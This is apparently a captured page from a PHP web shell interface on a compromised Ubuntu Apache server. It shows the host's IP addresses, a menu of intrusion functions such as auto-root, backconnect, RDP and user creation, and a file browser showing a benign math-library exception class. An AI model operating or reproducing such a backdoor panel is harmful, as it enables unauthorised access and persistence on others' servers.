Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.119.126.168
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
app /
vendor /
brick /
math /
src /
Exception /
[ HOME SHELL ]
Name
Size
Permission
Action
DivisionByZeroException.php
874
B
-rw-r--r--
IntegerOverflowException.php
612
B
-rw-r--r--
MathException.php
268
B
-rw-r--r--
NegativeNumberException.php
248
B
-rw-r--r--
NumberFormatException.php
799
B
-rw-r--r--
RoundingNecessaryException.php
508
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : IntegerOverflowException.php
<?php declare(strict_types=1); namespace Brick\Math\Exception; use Brick\Math\BigInteger; /** * Exception thrown when an integer overflow occurs. */ class IntegerOverflowException extends MathException { /** * @param BigInteger $value * * @return IntegerOverflowException * * @psalm-pure */ public static function toIntOverflow(BigInteger $value) : IntegerOverflowException { $message = '%s is out of range %d to %d and cannot be represented as an integer.'; return new self(\sprintf($message, (string) $value, PHP_INT_MIN, PHP_INT_MAX)); } }
Close